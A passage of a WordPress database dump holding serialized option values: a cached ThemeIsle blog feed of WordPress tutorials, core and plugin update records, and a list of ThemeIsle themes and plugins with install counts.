Tutorials\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=19710\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:548:\"<p>Looking for an easy way to add a WordPress favicon to your site? A favicon is the tiny image you’ll see at the left-hand side of any browser tab. By default, your site will only include a generic picture, so it’s up to you to add something custom. Doing this will help your site appear...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/wordpress-favicon/\">WordPress Favicon Guide: How to Create One and Add It to Your Site</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"John Hughes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://themeisle.com/blog/wordpress-favicon/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"How to Create a Landing Page With the Block Editor in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://themeisle.com/blog/create-a-landing-page-with-the-block-editor-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://themeisle.com/blog/create-a-landing-page-with-the-block-editor-wordpress/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Dec 2018 09:45:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:13:\"Page Builders\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:19:\"WordPress Tutorials\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=20527\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:617:\"<p>Wondering if it&#8217;s possible to create a landing page with the block editor that was released as part of WordPress 5.0? It is indeed, and this post will show you how. Thanks to the new &#8220;block&#8221; approach, you now have the ability to set up hero sections, call to actions (CTAs), and other important elements of...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/create-a-landing-page-with-the-block-editor-wordpress/\">How to Create a Landing Page With the Block Editor in WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"ThemeIsle Editorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"https://themeisle.com/blog/create-a-landing-page-with-the-block-editor-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:36:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"How to Disable the Block Editor (aka Gutenberg) and Use the Previous WordPress Editor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://themeisle.com/blog/previous-wordpress-editor/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://themeisle.com/blog/previous-wordpress-editor/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Dec 2018 09:36:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"WordPress Tutorials\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=20512\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:607:\"<p>The latest WordPress update is finally here – and it’s a big one. WordPress 5.0 brings a number of changes, but none is more significant than the new block editor, which you might also know as Gutenberg (its name while under development). If you don&#8217;t like the new editing experience in WordPress 5.0, you might...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/previous-wordpress-editor/\">How to Disable the Block Editor (aka Gutenberg) and Use the Previous WordPress Editor</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"John Hughes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://themeisle.com/blog/previous-wordpress-editor/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"What Is WordPress? WordPress 101, Explained for Beginners\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://themeisle.com/blog/what-is-wordpress-101/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://themeisle.com/blog/what-is-wordpress-101/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Dec 2018 11:01:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Resources\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=20506\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:598:\"<p>&#8220;So what is WordPress, exactly?&#8221; &#8211; you might be wondering. While WordPress is certainly not the only website operating system around, it is the unquestionable leader in this space. At the time of writing, WordPress runs 32% of all websites. Again, that is *all* websites. Just to show you how big the gap is between WordPress...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/what-is-wordpress-101/\">What Is WordPress? WordPress 101, Explained for Beginners</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Karol K\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://themeisle.com/blog/what-is-wordpress-101/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://themeisle.com/blog/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:11:{s:4:\"date\";s:29:\"Sun, 30 Dec 2018 12:04:33 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:6:\"server\";s:18:\"Pagely-ARES/1.3.21\";s:28:\"x-gateway-rate-limit-delayed\";s:16:\"0.21033333333333\";s:13:\"last-modified\";s:29:\"Fri, 28 Dec 2018 15:52:00 GMT\";s:4:\"etag\";s:34:\"\"1c1d4011509957a895abd871fdf9be5d\"\";s:12:\"x-robots-tag\";s:15:\"noindex, follow\";s:4:\"link\";s:63:\"<https://themeisle.com/blog/wp-json/>; rel=\"https://api.w.org/\"\";s:19:\"x-gateway-cache-key\";s:56:\"1546165083.586|standard|https|themeisle.com||/blog/feed/\";s:22:\"x-gateway-cache-status\";s:3:\"HIT\";s:20:\"x-gateway-skip-cache\";s:1:\"0\";}}s:5:\"build\";s:14:\"20180902130703\";}', 'no'),
(139, 'can_compress_scripts', '0', 'no'),
(203, '_site_transient_update_core', 'O:8:\"stdClass\":4:{s:7:\"updates\";a:2:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.0.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.0.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.0.2\";s:7:\"version\";s:5:\"5.0.2\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.0.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.0.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.0.2\";s:7:\"version\";s:5:\"5.0.2\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1546171530;s:15:\"version_checked\";s:5:\"4.9.9\";s:12:\"translations\";a:0:{}}', 'no'),
(198, '_transient_zerif_categories', '1', 'yes'),
(235, '_site_transient_update_plugins', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1546171545;s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:4:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:3:\"4.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/akismet.4.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}}s:29:\"pirate-forms/pirate-forms.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:26:\"w.org/plugins/pirate-forms\";s:4:\"slug\";s:12:\"pirate-forms\";s:6:\"plugin\";s:29:\"pirate-forms/pirate-forms.php\";s:11:\"new_version\";s:3:\"2.5\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/pirate-forms/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/plugin/pirate-forms.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/pirate-forms/assets/icon-128x128.png?rev=1635118\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/pirate-forms/assets/banner-772x250.png?rev=1635118\";}s:11:\"banners_rtl\";a:0:{}}s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/hello-dolly.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";s:2:\"1x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=969907\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";}s:11:\"banners_rtl\";a:0:{}}s:43:\"themeisle-companion/themeisle-companion.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:33:\"w.org/plugins/themeisle-companion\";s:4:\"slug\";s:19:\"themeisle-companion\";s:6:\"plugin\";s:43:\"themeisle-companion/themeisle-companion.php\";s:11:\"new_version\";s:5:\"2.7.3\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/themeisle-companion/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/themeisle-companion.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/themeisle-companion/assets/icon-128x128.png?rev=1807829\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/themeisle-companion/assets/banner-772x250.png?rev=1832347\";}s:11:\"banners_rtl\";a:0:{}}}}', 'no'),
(222, '_transient_themeisle_sdk_products', 'a:41:{i:0;a:4:{s:4:\"name\";s:4:\"Neve\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:4:\"neve\";s:8:\"installs\";i:7000;}i:1;a:4:{s:4:\"name\";s:5:\"Fagri\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:5:\"fagri\";s:8:\"installs\";i:6000;}i:2;a:4:{s:4:\"name\";s:5:\"Orfeo\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:5:\"orfeo\";s:8:\"installs\";i:20000;}i:3;a:4:{s:4:\"name\";s:11:\"Tiny Hestia\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:11:\"tiny-hestia\";s:8:\"installs\";i:5000;}i:4;a:4:{s:4:\"name\";s:6:\"Hestia\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:6:\"hestia\";s:8:\"installs\";i:100000;}i:5;a:4:{s:4:\"name\";s:15:\"Llorix One Lite\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:15:\"llorix-one-lite\";s:8:\"installs\";i:20000;}i:6;a:4:{s:4:\"name\";s:14:\"ResponsiveBoat\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:14:\"responsiveboat\";s:8:\"installs\";i:10000;}i:7;a:4:{s:4:\"name\";s:4:\"Oria\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:4:\"oria\";s:8:\"installs\";i:10000;}i:8;a:4:{s:4:\"name\";s:7:\"Oblique\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:7:\"oblique\";s:8:\"installs\";i:20000;}i:9;a:4:{s:4:\"name\";s:7:\"Amadeus\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:7:\"amadeus\";s:8:\"installs\";i:10000;}i:10;a:4:{s:4:\"name\";s:14:\"RokoPhoto Lite\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:14:\"rokophoto-lite\";s:8:\"installs\";i:6000;}i:11;a:4:{s:4:\"name\";s:6:\"FlyMag\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:6:\"flymag\";s:8:\"installs\";i:8000;}i:12;a:4:{s:4:\"name\";s:9:\"Shop Isle\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:9:\"shop-isle\";s:8:\"installs\";i:40000;}i:13;a:4:{s:4:\"name\";s:7:\"islemag\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:7:\"islemag\";s:8:\"installs\";i:10000;}i:14;a:4:{s:4:\"name\";s:10:\"Azera Shop\";s:4:\"type\";s:5:\"theme\";s:4:\"slug\";s:10:\"azera-shop\";s:8:\"installs\";i:7000;}i:15;a:4:{s:4:\"name\";s:19:\"Advanced CSS Editor\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:19:\"advanced-css-editor\";s:8:\"installs\";i:10000;}i:16;a:4:{s:4:\"name\";s:53:\"Elementor Addons &amp; Templates &#8211; Sizzify Lite\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:23:\"elementor-addon-widgets\";s:8:\"installs\";i:60000;}i:17;a:4:{s:4:\"name\";s:21:\"FEEDZY RSS Feeds Lite\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:16:\"feedzy-rss-feeds\";s:8:\"installs\";i:30000;}i:18;a:4:{s:4:\"name\";s:30:\"Google Maps Plugin by Intergeo\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:13:\"intergeo-maps\";s:8:\"installs\";i:50000;}i:19;a:4:{s:4:\"name\";s:20:\"Llorix One Companion\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:20:\"llorix-one-companion\";s:8:\"installs\";i:20000;}i:20;a:4:{s:4:\"name\";s:23:\"Menu Icons by ThemeIsle\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:10:\"menu-icons\";s:8:\"installs\";i:100000;}i:21;a:4:{s:4:\"name\";s:27:\"NavMenu Addon For Elementor\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:27:\"navmenu-addon-for-elementor\";s:8:\"installs\";i:50000;}i:22;a:4:{s:4:\"name\";s:22:\"Orbit Fox by ThemeIsle\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:19:\"themeisle-companion\";s:8:\"installs\";i:300000;}i:23;a:4:{s:4:\"name\";s:28:\"Page Templater For Elementor\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:19:\"elementor-templater\";s:8:\"installs\";i:30000;}i:24;a:4:{s:4:\"name\";s:50:\"Revive Old Posts &#8211; Auto Post to Social Media\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:14:\"tweet-old-post\";s:8:\"installs\";i:60000;}i:25;a:4:{s:4:\"name\";s:56:\"Slider by Nivo &#8211; Responsive WordPress Image Slider\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:16:\"nivo-slider-lite\";s:8:\"installs\";i:40000;}i:26;a:4:{s:4:\"name\";s:58:\"Visualizer: Tables and Charts Manager for WordPress (Lite)\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:10:\"visualizer\";s:8:\"installs\";i:30000;}i:27;a:4:{s:4:\"name\";s:22:\"WP Product Review Lite\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:17:\"wp-product-review\";s:8:\"installs\";i:50000;}i:28;a:4:{s:4:\"name\";s:19:\"Advanced CSS Editor\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:19:\"advanced-css-editor\";s:8:\"installs\";i:10000;}i:29;a:4:{s:4:\"name\";s:53:\"Elementor Addons &amp; Templates &#8211; Sizzify Lite\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:23:\"elementor-addon-widgets\";s:8:\"installs\";i:60000;}i:30;a:4:{s:4:\"name\";s:21:\"FEEDZY RSS Feeds Lite\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:16:\"feedzy-rss-feeds\";s:8:\"installs\";i:30000;}i:31;a:4:{s:4:\"name\";s:30:\"Google Maps Plugin by Intergeo\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:13:\"intergeo-maps\";s:8:\"installs\";i:50000;}i:32;a:4:{s:4:\"name\";s:20:\"Llorix One Companion\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:20:\"llorix-one-companion\";s:8:\"installs\";i:20000;}i:33;a:4:{s:4:\"name\";s:23:\"Menu Icons by ThemeIsle\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:10:\"menu-icons\";s:8:\"installs\";i:100000;}i:34;a:4:{s:4:\"name\";s:27:\"NavMenu Addon For Elementor\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:27:\"navmenu-addon-for-elementor\";s:8:\"installs\";i:50000;}i:35;a:4:{s:4:\"name\";s:22:\"Orbit Fox by ThemeIsle\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:19:\"themeisle-companion\";s:8:\"installs\";i:300000;}i:36;a:4:{s:4:\"name\";s:28:\"Page Templater For Elementor\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:19:\"elementor-templater\";s:8:\"installs\";i:30000;}i:37;a:4:{s:4:\"name\";s:50:\"Revive Old Posts &#8211; Auto Post to Social Media\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:14:\"tweet-old-post\";s:8:\"installs\";i:60000;}i:38;a:4:{s:4:\"name\";s:56:\"Slider by Nivo &#8211; Responsive WordPress Image Slider\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:16:\"nivo-slider-lite\";s:8:\"installs\";i:40000;}i:39;a:4:{s:4:\"name\";s:58:\"Visualizer: Tables and Charts Manager for WordPress (Lite)\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:10:\"visualizer\";s:8:\"installs\";i:30000;}i:40;a:4:{s:4:\"name\";s:22:\"WP Product Review 